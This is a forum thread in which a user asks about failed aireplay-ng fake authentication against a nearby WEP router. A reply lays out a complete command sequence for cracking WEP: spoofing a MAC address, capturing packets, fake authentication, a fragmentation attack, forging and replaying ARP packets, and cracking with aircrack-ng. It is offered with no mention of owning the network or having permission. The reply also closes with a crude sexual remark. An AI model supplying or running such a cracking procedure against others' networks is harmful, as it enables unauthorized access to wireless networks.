Fake authentication with an AP

Get the latest on wired & wireless, talk network setups, get help with connectivity problems, web hosts, etc.
Post Reply
User avatar
korin
Guru
Posts: 592
Joined: Wed Nov 08, 2006 5:51 pm

Fake authentication with an AP

Post by korin » Sat Jul 14, 2007 8:34 pm

I'm playing around with aircrack-ng on my fresh install of ubuntu (i understand, it's a noob linux, but a linux none-the-less.), and i've installed the aircrack-ng suite. I have my wireless card working, it is an RT2500, which sucks balls getting the drivers working, for me anyways.

I was following some of the guides on the official aircrack-ng site here.

I get to the step for fake authentication using aireplay-ng. It fails everytime. Is there perhaps another authentication method to try? Or do I have to go packing for another router to try.

Btw, the router I'm trying on is near enough to send/recieve data, and it is protected by WEP. Not sure which kind of WEP though, 64-bit, 128-bit, etc . . .

c0ld3l3m3nt
n00b
Posts: 1
Joined: Tue Sep 30, 2008 12:54 pm
Contact:

Re: Fake authentication with an AP

Post by c0ld3l3m3nt » Tue Sep 30, 2008 1:37 pm

I would suggest you use SpoonWep till you understand exactly what you are doing and why... but if not here...
airmon-ng stop <interface>
ifconfig <interface> down
macchanger --mac 00:11:22:33:44:55 <interface>
airmon-ng start <interface>
airodump-ng <interface>
*find the access point youre trying to get wep from...*
*once found use the information from it to do the following commands...*
airodump-ng -c <channel> -w wep --bssid <AP's Mac> <interface>
Now open up another shell window...
aireplay-ng -1 0 -a <AP's Mac> -h 00:11:22:33:44:55 <interface>
After pressing enter if you dont get "Association Successful :-) (AID: 1)"
Either your card isnt compatible... or you need to check your commands perhaps mac filtering too
aireplay-ng -5 -b <AP's Mac> -h 00:11:22:33:44:55 <interface>
Verify the mac of this packet with the mac of your AP's Mac... if it is the same enter y
packetforge-ng -0 -a <AP's Mac> -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y <.XOR File> -w ARP
Now here the .xor file was listed after you entered y for the packet verification... you will need this files name where I entered <.XOR file>
aireplay-ng -2 -r ARP <interface>
Press y here again and watch the packets being sent ... when it reaches atleast 20,000 you can start cracking..
Open another shell window and type...
aircrack-ng wep-01.cap
I would like to also add if connecting through linux .... Ive known ppl to have this problem.. but you must remember to stop monitoring mode
airmon-ng stop <interface>
ifconfig <interface> up
and in just 90 minutes I can show you how all your problems can be resolved with my penis...

Post Reply